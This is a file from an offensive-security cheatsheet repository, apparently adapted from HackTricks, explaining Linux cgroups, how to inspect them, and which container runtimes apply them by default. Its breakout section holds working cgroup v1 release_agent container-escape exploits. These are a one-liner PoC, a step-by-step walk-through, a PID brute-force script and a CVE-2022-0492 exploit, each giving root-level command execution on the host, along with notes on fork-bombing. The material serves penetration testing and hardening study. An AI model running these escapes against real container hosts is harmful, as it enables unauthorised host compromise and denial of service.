daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

cgroups.md (15145B)


      1 ---
      2 title: "cgroups"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/cgroups.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/cgroups.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # cgroups
     14 
     15 ## Overview
     16 
     17 Linux **control groups** are the kernel mechanism used to group processes together for accounting, limiting, prioritization, and policy enforcement. If namespaces are mainly about isolating the view of resources, cgroups are mainly about governing **how much** of those resources a set of processes may consume and, in some cases, **which classes of resources** they may interact with at all. Containers rely on cgroups constantly, even when the user never looks at them directly, because almost every modern runtime needs a way to tell the kernel "these processes belong to this workload, and these are the resource rules that apply to them".
     18 
     19 This is why container engines place a new container into its own cgroup subtree. Once the process tree is there, the runtime can cap memory, limit the number of PIDs, weight CPU usage, regulate I/O, and restrict device access. In a production environment, this is essential both for multi-tenant safety and for simple operational hygiene. A container without meaningful resource controls may be able to exhaust memory, flood the system with processes, or monopolize CPU and I/O in ways that make the host or neighboring workloads unstable.
     20 
     21 From a security perspective, cgroups matter in two separate ways. First, bad or missing resource limits enable straightforward denial-of-service attacks. Second, some cgroup features, especially in older **cgroup v1** setups, have historically created powerful breakout primitives when they were writable from inside a container.
     22 
     23 ## v1 Vs v2
     24 
     25 There are two major cgroup models in the wild. **cgroup v1** exposes multiple controller hierarchies, and older exploit writeups often revolve around the weird and sometimes overly powerful semantics available there. **cgroup v2** introduces a more unified hierarchy and generally cleaner behavior. Modern distributions increasingly prefer cgroup v2, but mixed or legacy environments still exist, which means both models are still relevant when reviewing real systems.
     26 
     27 The difference matters because some of the most famous container breakout stories, such as abuses of **`release_agent`** in cgroup v1, are tied very specifically to older cgroup behavior. A reader who sees a cgroup exploit on a blog and then blindly applies it to a modern cgroup v2-only system is likely to misunderstand what is actually possible on the target.
     28 
     29 ## Inspection
     30 
     31 The quickest way to see where your current shell sits is:
     32 
     33 ```bash
     34 cat /proc/self/cgroup
     35 findmnt -T /sys/fs/cgroup
     36 ```
     37 
     38 The `/proc/self/cgroup` file shows the cgroup paths associated with the current process. On a modern cgroup v2 host, you will often see a unified entry. On older or hybrid hosts, you may see multiple v1 controller paths. Once you know the path, you can inspect the corresponding files under `/sys/fs/cgroup` to see limits and current usage.
     39 
     40 On a cgroup v2 host, the following commands are useful:
     41 
     42 ```bash
     43 ls -l /sys/fs/cgroup
     44 cat /sys/fs/cgroup/cgroup.controllers
     45 cat /sys/fs/cgroup/cgroup.subtree_control
     46 ```
     47 
     48 These files reveal which controllers exist and which ones are delegated to child cgroups. This delegation model matters in rootless and systemd-managed environments, where the runtime may only be able to control the subset of cgroup functionality that the parent hierarchy actually delegates.
     49 
     50 ## Lab
     51 
     52 One way to observe cgroups in practice is to run a memory-limited container:
     53 
     54 ```bash
     55 docker run --rm -it --memory=256m debian:stable-slim bash
     56 cat /proc/self/cgroup
     57 cat /sys/fs/cgroup/memory.max 2>/dev/null || cat /sys/fs/cgroup/memory.limit_in_bytes 2>/dev/null
     58 ```
     59 
     60 You can also try a PID-limited container:
     61 
     62 ```bash
     63 docker run --rm -it --pids-limit=64 debian:stable-slim bash
     64 cat /sys/fs/cgroup/pids.max 2>/dev/null
     65 ```
     66 
     67 These examples are useful because they help connect the runtime flag to the kernel file interface. The runtime is not enforcing the rule by magic; it is writing the relevant cgroup settings and then letting the kernel enforce them against the process tree.
     68 
     69 ## Runtime Usage
     70 
     71 Docker, Podman, containerd, and CRI-O all rely on cgroups as part of normal operation. The differences are usually not about whether they use cgroups, but about **which defaults they choose**, **how they interact with systemd**, **how rootless delegation works**, and **how much of the configuration is controlled at the engine level versus the orchestration level**.
     72 
     73 In Kubernetes, resource requests and limits eventually become cgroup configuration on the node. The path from Pod YAML to kernel enforcement passes through the kubelet, the CRI runtime, and the OCI runtime, but cgroups are still the kernel mechanism that finally applies the rule. In Incus/LXC environments, cgroups are also heavily used, especially because system containers often expose a richer process tree and more VM-like operational expectations.
     74 
     75 ## Misconfigurations And Breakouts
     76 
     77 The classic cgroup security story is the writable **cgroup v1 `release_agent`** mechanism. In that model, if an attacker could write to the right cgroup files, enable `notify_on_release`, and control the path stored in `release_agent`, the kernel could end up executing an attacker-chosen path in the initial namespaces on the host when the cgroup became empty. That is why older writeups place so much attention on cgroup controller writability, mount options, and namespace/capability conditions.
     78 
     79 Even when `release_agent` is not available, cgroup mistakes still matter. Overly broad device access can make host devices reachable from the container. Missing memory and PID limits can turn a simple code execution into a host DoS. Weak cgroup delegation in rootless scenarios can also mislead defenders into assuming a restriction exists when the runtime was never actually able to apply it.
     80 
     81 ### `release_agent` Background
     82 
     83 The `release_agent` technique only applies to **cgroup v1**. The basic idea is that when the last process in a cgroup exits and `notify_on_release=1` is set, the kernel executes the program whose path is stored in `release_agent`. That execution happens in the **initial namespaces on the host**, which is what turns a writable `release_agent` into a container escape primitive.
     84 
     85 For the technique to work, the attacker generally needs:
     86 
     87 - a writable **cgroup v1** hierarchy
     88 - the ability to create or use a child cgroup
     89 - the ability to set `notify_on_release`
     90 - the ability to write a path into `release_agent`
     91 - a path that resolves to an executable from the host point of view
     92 
     93 ### Classic PoC
     94 
     95 The historical one-liner PoC is:<sup>[[1]](#references)</sup>
     96 
     97 ```bash
     98 d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))
     99 mkdir -p "$d/w"
    100 echo 1 > "$d/w/notify_on_release"
    101 t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
    102 touch /o
    103 echo "$t/c" > "$d/release_agent"
    104 cat <<'EOF' > /c
    105 #!/bin/sh
    106 ps aux > "$t/o"
    107 EOF
    108 chmod +x /c
    109 sh -c "echo 0 > $d/w/cgroup.procs"
    110 sleep 1
    111 cat /o
    112 ```
    113 
    114 This PoC writes a payload path into `release_agent`, triggers cgroup release, and then reads back the output file generated on the host.
    115 
    116 ### Readable Walk-Through
    117 
    118 The same idea is easier to understand when broken into steps.<sup>[[1]](#references)</sup>
    119 
    120 1. Create and prepare a writable cgroup:
    121 
    122 ```bash
    123 mkdir /tmp/cgrp
    124 mount -t cgroup -o rdma cgroup /tmp/cgrp    # or memory if available in v1
    125 mkdir /tmp/cgrp/x
    126 echo 1 > /tmp/cgrp/x/notify_on_release
    127 ```
    128 
    129 2. Identify the host path that corresponds to the container filesystem:
    130 
    131 ```bash
    132 host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
    133 echo "$host_path/cmd" > /tmp/cgrp/release_agent
    134 ```
    135 
    136 3. Drop a payload that will be visible from the host path:
    137 
    138 ```bash
    139 cat <<'EOF' > /cmd
    140 #!/bin/sh
    141 ps aux > /output
    142 EOF
    143 chmod +x /cmd
    144 ```
    145 
    146 4. Trigger execution by making the cgroup empty:
    147 
    148 ```bash
    149 sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"
    150 sleep 1
    151 cat /output
    152 ```
    153 
    154 The effect is host-side execution of the payload with host root privileges. In a real exploit, the payload usually writes a proof file, spawns a reverse shell, or modifies host state.
    155 
    156 ### Relative Path Variant Using `/proc/<pid>/root`
    157 
    158 In some environments, the host path to the container filesystem is not obvious or is hidden by the storage driver. In that case the payload path can be expressed through `/proc/<pid>/root/...`, where `<pid>` is a host PID belonging to a process in the current container. That is the basis of the relative-path brute-force variant:<sup>[[2]](#references)</sup>
    159 
    160 ```bash
    161 #!/bin/sh
    162 
    163 OUTPUT_DIR="/"
    164 MAX_PID=65535
    165 CGROUP_NAME="xyx"
    166 CGROUP_MOUNT="/tmp/cgrp"
    167 PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
    168 PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
    169 OUTPUT_NAME="${CGROUP_NAME}_payload.out"
    170 OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"
    171 
    172 sleep 10000 &
    173 
    174 cat > ${PAYLOAD_PATH} << __EOF__
    175 #!/bin/sh
    176 OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}
    177 ps -eaf > \${OUTPATH} 2>&1
    178 __EOF__
    179 
    180 chmod a+x ${PAYLOAD_PATH}
    181 
    182 mkdir ${CGROUP_MOUNT}
    183 mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
    184 mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
    185 echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release
    186 
    187 TPID=1
    188 while [ ! -f ${OUTPUT_PATH} ]
    189 do
    190   if [ $((${TPID} % 100)) -eq 0 ]
    191   then
    192     echo "Checking pid ${TPID}"
    193     if [ ${TPID} -gt ${MAX_PID} ]
    194     then
    195       echo "Exiting at ${MAX_PID}"
    196       exit 1
    197     fi
    198   fi
    199   echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
    200   sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
    201   TPID=$((${TPID} + 1))
    202 done
    203 
    204 sleep 1
    205 cat ${OUTPUT_PATH}
    206 ```
    207 
    208 The relevant trick here is not the brute force itself but the path form: `/proc/<pid>/root/...` lets the kernel resolve a file inside the container filesystem from the host namespace, even when the direct host storage path is not known ahead of time.
    209 
    210 ### CVE-2022-0492 Variant
    211 
    212 In 2022, CVE-2022-0492 showed that writing to `release_agent` in cgroup v1 was not correctly checking for `CAP_SYS_ADMIN` in the **initial** user namespace. This made the technique far more reachable on vulnerable kernels because a container process that could mount a cgroup hierarchy could write `release_agent` without already being privileged in the host user namespace.<sup>[[3]](#references)</sup>
    213 
    214 Minimal exploit:
    215 
    216 ```bash
    217 apk add --no-cache util-linux
    218 unshare -UrCm sh -c '
    219   mkdir /tmp/c
    220   mount -t cgroup -o memory none /tmp/c
    221   echo 1 > /tmp/c/notify_on_release
    222   echo /proc/self/exe > /tmp/c/release_agent
    223   (sleep 1; echo 0 > /tmp/c/cgroup.procs) &
    224   while true; do sleep 1; done
    225 '
    226 ```
    227 
    228 On a vulnerable kernel, the host executes `/proc/self/exe` with host root privileges.
    229 
    230 For practical abuse, start by checking whether the environment still exposes writable cgroup-v1 paths or dangerous device access:
    231 
    232 ```bash
    233 mount | grep cgroup
    234 find /sys/fs/cgroup -maxdepth 3 -name release_agent 2>/dev/null -exec ls -l {} \;
    235 find /sys/fs/cgroup -maxdepth 3 -writable 2>/dev/null | head -n 50
    236 ls -l /dev | head -n 50
    237 ```
    238 
    239 If `release_agent` is present and writable, you are already in legacy-breakout territory:
    240 
    241 ```bash
    242 find /sys/fs/cgroup -maxdepth 3 -name notify_on_release 2>/dev/null
    243 find /sys/fs/cgroup -maxdepth 3 -name cgroup.procs 2>/dev/null | head
    244 ```
    245 
    246 If the cgroup path itself does not yield an escape, the next practical use is often denial of service or reconnaissance:
    247 
    248 ```bash
    249 cat /sys/fs/cgroup/pids.max 2>/dev/null
    250 cat /sys/fs/cgroup/memory.max 2>/dev/null
    251 cat /sys/fs/cgroup/cpu.max 2>/dev/null
    252 ```
    253 
    254 These commands quickly tell you whether the workload has room to fork-bomb, consume memory aggressively, or abuse a writable legacy cgroup interface.
    255 
    256 ## Checks
    257 
    258 When reviewing a target, the purpose of the cgroup checks is to learn which cgroup model is in use, whether the container sees writable controller paths, and whether old breakout primitives such as `release_agent` are even relevant.
    259 
    260 ```bash
    261 cat /proc/self/cgroup                                      # Current process cgroup placement
    262 mount | grep cgroup                                        # cgroup v1/v2 mounts and mount options
    263 find /sys/fs/cgroup -maxdepth 3 -name release_agent 2>/dev/null   # Legacy v1 breakout primitive
    264 cat /proc/1/cgroup                                         # Compare with PID 1 / host-side process layout
    265 ```
    266 
    267 What is interesting here:
    268 
    269 - If `mount | grep cgroup` shows **cgroup v1**, older breakout writeups become more relevant.
    270 - If `release_agent` exists and is reachable, that is immediately worth deeper investigation.
    271 - If the visible cgroup hierarchy is writable and the container also has strong capabilities, the environment deserves much closer review.
    272 
    273 If you discover **cgroup v1**, writable controller mounts, and a container that also has strong capabilities or weak seccomp/AppArmor protection, that combination deserves careful attention. cgroups are often treated as a boring resource-management topic, but historically they have been part of some of the most instructive container escape chains precisely because the boundary between "resource control" and "host influence" was not always as clean as people assumed.
    274 
    275 ## Runtime Defaults
    276 
    277 | Runtime / platform | Default state | Default behavior | Common manual weakening |
    278 | --- | --- | --- | --- |
    279 | Docker Engine | Enabled by default | Containers are placed in cgroups automatically; resource limits are optional unless set with flags | omitting `--memory`, `--pids-limit`, `--cpus`, `--blkio-weight`; `--device`; `--privileged` |
    280 | Podman | Enabled by default | `--cgroups=enabled` is the default; cgroup namespace defaults vary by cgroup version (`private` on cgroup v2, `host` on some cgroup v1 setups) | `--cgroups=disabled`, `--cgroupns=host`, relaxed device access, `--privileged` |
    281 | Kubernetes | Enabled through the runtime by default | Pods and containers are placed in cgroups by the node runtime; fine-grained resource control depends on `resources.requests` / `resources.limits` | omitting resource requests/limits, privileged device access, host-level runtime misconfiguration |
    282 | containerd / CRI-O | Enabled by default | cgroups are part of normal lifecycle management | direct runtime configs that relax device controls or expose legacy writable cgroup v1 interfaces |
    283 
    284 The important distinction is that **cgroup existence** is usually default, while **useful resource constraints** are often optional unless explicitly configured.
    285 
    286 ## References
    287 
    288 - [1] [Understanding Docker container escapes](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
    289 - [2] [Privileged Container Escape - Control Groups release_agent](https://blog.ajxchapman.com/posts/2020/11/19/privileged-container-escape.html)
    290 - [3] [New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)